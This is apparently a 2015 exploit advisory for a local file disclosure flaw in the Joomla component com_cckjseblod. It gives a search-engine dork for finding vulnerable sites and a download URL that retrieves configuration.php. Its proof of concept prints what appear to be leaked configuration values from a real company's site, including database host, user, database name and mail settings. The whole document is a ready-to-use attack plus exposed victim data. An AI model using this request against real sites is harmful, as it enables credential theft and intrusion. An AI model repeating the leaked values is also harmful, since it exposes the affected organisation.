Exploit title: joomla cckjseblod exploit LFD
date: 27/10/2015
tested on: kali linux
homepage: dont have
version: maybe all
Author: Đầu Lâu
Dork: inurl:option=com_cckjseblod
link vuln:
www.site.com/index.php?option=com_cckjseblod&task=download&file=configuration.php
POC:
var $dbtype = 'mysql';
var $host = 'localhost:3306';
var $user = 'star-_nice_mz';
var $db = 'star-pk_StarDB';
var $dbprefix = 'jos_';
var $mailer = 'smtp';
var $mailfrom = 'noreply@xxx.com';
var $fromname = 'Web Master, Star Marketing Pvt. Ltd.';
var $sendmail = '/usr/sbin/sendmail';